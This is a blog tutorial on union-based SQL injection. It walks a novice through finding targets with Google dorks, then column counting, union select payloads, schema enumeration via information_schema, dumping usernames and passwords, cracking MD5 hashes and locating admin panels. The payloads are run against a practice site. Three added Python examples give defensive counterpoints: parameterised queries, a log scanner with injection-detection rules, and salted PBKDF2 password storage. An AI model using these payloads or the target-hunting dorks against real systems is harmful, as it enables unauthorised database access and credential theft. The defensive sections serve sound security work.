Thursday, April 14, 2016

Union based SQL Injection 100% noob [BASIC]

!! WARNING FOR EDUCATION PURPOSE ONLY !!

I : Table Of Contents
II : Introduction
Step 1 : Learning basics
Step 2 : Finding target website
Step 3 : Checking if vulnerable to SQL Injection
Step 4 : Getting vulnerable columns
Step 5 : Getting injectable column
Step 6 : Getting Version
Step 7 : Getting database
Step 8 : Getting tables
Step 9 : Getting columns
Step 10 : Dumping data
Step 11 : Logging in to admin panel or login panel
Tips
Goodbye

II : Introduction

So this is my first tutorial and my second post..
Today I'm gonna teach you about, ummm, let's see what I can teach... about how to watch pr0nz, I mean, how to hack a website through SQL injection.

Step 1 : Learning basics
1) Google dorks
What are Google dorks? Google dorks are search operators such as "inurl:" and "intext:" that make searching easier by narrowing the results.

Why do we need that?
No, we really don't need that. Just kidding, of course we need that to get target websites!

How do we use it?
For example, go to Google and search: " inurl:news.php?id= "
You'll see results like www.website.com/news.php?id=5

So what's next?

2) SQL
Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Of course, Wikipedia.

3) SQL injection
SQL injection is a kind of attack in which malicious input is inserted into SQL statements to drop, update, add to, view, etc. a database.

So after learning some basics, we will now proceed to another basic: basic SQL injection, 100% for the noob learner.

Step 2 : Finding target website
Google: " inurl:news.php?id= "
You can make your own Google dork if you want; the common dorks are:

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

So get some target and let's start.

Step 3 : Checking if vulnerable to SQL Injection
After getting a website target, we will now check if it's vulnerable to SQL injection or not.
For example, this is my target: leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1

You'll add a single quote " ' " to the end of the number:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1'

Now if you see an error text, or the page doesn't look normal, then there's a chance that it's vulnerable to SQL injection.
But if the page loads normally, too bad. It's not vulnerable.

What to do if it's not vulnerable?
Of course, find another website xD

Step 4 : Getting vulnerable columns
After you find it vulnerable to SQL injection, it's time to count the columns using ORDER BY:
leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1--
Increase the number 1 until you get an error.

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 1-- ("No error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 2-- ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 10--("No error?!")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1 order by 100000--("No error?!!")

So if that happens, you got to 99999 and still no error, that means the ID is a string, not an integer.

So how will we fix it?
Simply add " ' " after the number and add " + " at the end:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+

Start:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 1--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 2--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 3--+ ("no error")
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' order by 4--+ ("Error!!!!")

Error While Selection process : Unknown column '4' in 'order clause'

There we go! We know that there are 3 columns. Now we will check which column is injectable!

Question:
What is the " -- "?
The -- starts a comment, so the database ignores everything after it. (In MySQL the -- must be followed by a space, which is why the URL ends in + : the + becomes a space.)

Step 5 : Getting Injectable column
We will now get the injectable column! So there are 3 columns, so
simply add a negative sign ( - ) before the number and add union select:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,2,3--+

And there it is!
Username is : 2

Column 2 is injectable! So that is where we will inject our malicious SQL statement!
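Here is an added example (my own code, not part of the original post or of the leettime.net site) that shows why Steps 3 to 5 work and what the fix looks like. It builds a tiny constructed users table in an in-memory SQLite database, runs the same probes the post uses (a lone quote, order by N, a negative id with union select) against a query that is built by string concatenation, and then against the same query with a bound parameter. The table, the column names and the sample rows are all assumptions for the demo; SQLite's error messages differ from MySQL's, but the pattern (ORDER BY out of range, UNION column-count mismatch, quote breaking the literal) is the same.

```python
import sqlite3

# Constructed sample data: a tiny users table standing in for the target's database.
SAMPLE_USERS = [
    (1, "alice", "s3cret"),
    (2, "bob", "hunter2"),
]


def build_db():
    """Create an in-memory database with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, id_param):
    """Builds the query by string concatenation: the id parameter becomes part
    of the SQL text, so a quote inside it closes the literal and whatever follows
    (order by, union select, --) is parsed as SQL."""
    sql = f"SELECT id, username, password FROM users WHERE id = '{id_param}'"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, id_param):
    """Same query with a bound parameter: the value travels separately from the
    SQL text, so it can only ever be compared against id, never change the
    statement. The injection strings simply match no row."""
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchone()


def observe(lookup, conn, id_param):
    """Run a lookup and report what the page would show: the row that came back,
    or the database error text (the 'errored text' the post tells you to look for)."""
    try:
        return ("row", lookup(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    probes = ["1", "1'", "1' order by 3--", "1' order by 4--",
              "-1' union select 1,2--", "-1' union select 1,2,3--"]
    for payload in probes:
        print(f"{payload!r:30} vulnerable -> {observe(vulnerable_lookup, db, payload)}")
        print(f"{'':30} safe       -> {observe(safe_lookup, db, payload)}")
```

Running it, the concatenated query errors on the lone quote, accepts order by 3 and errors on order by 4 (three columns), rejects a union with two values and returns the row (1, 2, 3) for a union with three, exactly the sequence in Steps 3 to 5. The parameterised query returns the alice row for "1" and nothing for every other probe, with no error: that one change is the fix a developer needs.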

Step 6 : Checking version
So before getting information, let's check the version first by simply changing the 2 to @@version. So:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,@@version,3--+

Username is : 5.5.48-cll

If the version is greater than or equal to 5 then you can proceed. If it's less than 5, too bad; I recommend you change the target website. But if you really wanna hack it, then I suggest you try blind SQL injection in other tutorials, but it's so hard, so I never tried it.

Step 7 : Getting database
Now that we've got the injectable column, we will check the name of the database!
Simply change the 2 to database():
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,database(),3--+

There ya go!
Username is : leettime_761wHole

Now we know that the database name is leettime_761wHole

Save the database name, we will use it.

Step 8 : Getting tables
After we get the database name, we will now get the tables of the database.
Go to http://shunz19.blogspot.com/2016/04/string-tools.html and hex-encode the database name.

Now leettime_761wHole in hex is "6c65657474696d655f37363177486f6c65",
then add 0x at the start, so "0x6c65657474696d655f37363177486f6c65".

So simply change the 2 to (select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65)

So it will be:

http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x6c65657474696d655f37363177486f6c65),3--+

and there you go!
Username is : testtable1,userlogs,users

We got the tables! Now we have to get the columns.

Step 9 : Getting columns
Just hold on! We're close now. Now we have to get the columns.
Again you need to hex-encode the table name and add 0x at the start, so
users = " 0x7573657273 "
then simply change the 2 to (select group_concat(column_name) from information_schema.columns where table_name=0x7573657273)

so the link will be
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),3--+

There we go again!
Username is : id,username,password,user_type,sec_code

Step 10 : Dumping data
So this will be the easiest one, I think, because it's dump data time!!
Simply change the 2 to (select group_concat(columns) from database.table),
so (select group_concat(username,password) from leettime_761wHole.users)

So the link will be:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,password) from leettime_761wHole.users),3--+

And now :D
Username is : injectorkhan,decompilerhacktract,devilhuntedante,Zensec-idiots,Zenodermussecurity-i,grayhathacker,khanhaxor,adminsadmin

Oh wait, we forgot the separator! Let's just simply add 0x3a.
What is 0x3a?
0x3a is the hex code for " : ". We will use it as a separator between our columns so we can tell which is the username and which is the password: group_concat(username,0x3a,password)

so:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from leettime_761wHole.users),3--+
Username is : injector:khan,decompiler:hacktract,devilhunte:dante,Zen:sec-idiots,Zenodermus:security-i,grayhat:hacker,khan:haxor,admin:sadmin
Yeah, there ya go. Time to look for some admin panel to log in to.
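Every request in Steps 3 to 10 lands in the web server's access log, so here is an added example from the other side of the fence (my own code, not from the post or from any of the sites it mentions): a small scanner that URL-decodes the query string of each log line and flags the signatures of the technique, such as order by N, union select, information_schema, @@version, and a quote followed by a comment. It also decodes the 0x hex literals back into text so an analyst can see which schema and table names were asked for. The log lines are constructed for the demo (documentation IP ranges, the post's own payload shapes); the rule names and the log format regex are my assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache common-log style). The client
# addresses are documentation ranges; the requests mirror the probes from the post.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Apr/2016:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4521
203.0.113.5 - - [14/Apr/2016:10:00:09 +0000] "GET /news.php?id=1%27 HTTP/1.1" 500 312
203.0.113.5 - - [14/Apr/2016:10:00:15 +0000] "GET /news.php?id=1%27%20order%20by%204--+ HTTP/1.1" 500 340
203.0.113.5 - - [14/Apr/2016:10:00:31 +0000] "GET /news.php?id=-1%27%20union%20select%201,@@version,3--+ HTTP/1.1" 200 4490
203.0.113.5 - - [14/Apr/2016:10:01:02 +0000] "GET /news.php?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x6c65657474696d655f37363177486f6c65),3--+ HTTP/1.1" 200 4600
198.51.100.7 - - [14/Apr/2016:10:01:10 +0000] "GET /gallery.php?id=19 HTTP/1.1" 200 2210
"""

# client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$')

# Signatures of the union-based technique, matched on the URL-decoded,
# lower-cased query string. Rule names are assumptions for this demo.
RULES = [
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema_enum", re.compile(r"\binformation_schema\b")),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)")),
    ("quote_then_comment", re.compile(r"'.*?(?:--|#|/\*)")),
    ("quote_in_value", re.compile(r"'")),
]

HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]+)")


def decode_hex_literals(query):
    """Turn 0x... literals back into text so the analyst can see which schema
    or table names the request asked for (odd-length runs are skipped)."""
    names = []
    for h in HEX_LITERAL_RE.findall(query):
        if len(h) % 2 == 0:
            names.append(bytes.fromhex(h).decode("utf-8", "replace"))
    return names


def scan_log(text):
    """Return one hit per log line whose decoded query matches at least one rule."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status, _size = m.groups()
        parts = urlsplit(target)
        query = unquote_plus(parts.query).lower()   # %27 -> ', + -> space
        rules = [name for name, rx in RULES if rx.search(query)]
        if rules:
            hits.append({
                "line": line_no, "client": client, "time": when,
                "path": parts.path, "status": status,
                "rules": rules, "decoded_hex": decode_hex_literals(query),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['path']} "
              f"status={hit['status']} rules={hit['rules']} names={hit['decoded_hex']}")
```

On the sample, lines 2 to 5 are flagged and line 5 decodes to the schema name leettime_761wHole. The useful signal for a defender is the sequence from one client: a lone quote that produces a 500, then order by with climbing numbers, then union select, all within a minute. A single quote_in_value hit on its own is noisy (names like O'Brien), which is why the rules are reported separately rather than collapsed into one verdict.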

Step 11 : Logging in to admin panel or login panel
Some passwords are hashed with MD5. You can crack the hash using md5online.com, crackstation.net, hash-killer.co.uk, etc.

So now that we've got the login credentials, we will find the login page or admin page to log in and get access to the site.
These are common links:
www.website.com/admin
www.website.com/administrator
www.website.com/login.php
www.website.com/admin.php
www.website.com/administrator.php
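The reason the dump in Step 10 hands over working logins is that the passwords are stored in plain text, and Step 11 says that even the hashed ones are usually unsalted MD5, which lookup sites crack instantly. Here is an added example (my own code, not from the post) contrasting that storage with salted, iterated PBKDF2-HMAC-SHA256 from Python's standard library: two users with the same password get identical MD5 hashes but different PBKDF2 records, and verification re-derives the hash with the stored salt and compares in constant time. The record format, iteration count and sample users are my assumptions.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000  # PBKDF2 work factor (assumed for the demo); raise it as hardware gets faster


def md5_store(password):
    """Unsalted MD5, the storage the post expects to find: equal passwords give
    equal hashes, so one precomputed table or online lookup cracks every user."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_store(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256. A fresh random salt per user means two
    users with the same password get different records, and the iteration count
    makes every guess expensive. Record layout: algo$iterations$salt$digest."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def pbkdf2_verify(password, stored):
    """Re-derive with the stored salt and iteration count and compare in constant
    time, so a dumped record on its own is not a usable credential."""
    algo, iterations, salt_b64, digest_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    # Constructed sample: two users who happen to share the same password.
    for user in ("alice", "bob"):
        print(user, "md5    ", md5_store("hunter2"))
        print(user, "pbkdf2 ", pbkdf2_store("hunter2"))
    record = pbkdf2_store("hunter2")
    print("verify correct:", pbkdf2_verify("hunter2", record))
    print("verify wrong:  ", pbkdf2_verify("hunter3", record))
```

The MD5 lines for alice and bob are identical, which is exactly what makes a lookup site work; the PBKDF2 records differ and cannot be looked up. This does not stop the injection itself (that is the parameterised query), but it limits what a dumped users table is worth.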

Tips
If you want to list all the databases, this is the code:
(select group_concat(schema_name) from information_schema.schemata)

Goodbye
Hope you enjoyed my post and learned something! If you have questions or feedback please feel free to comment!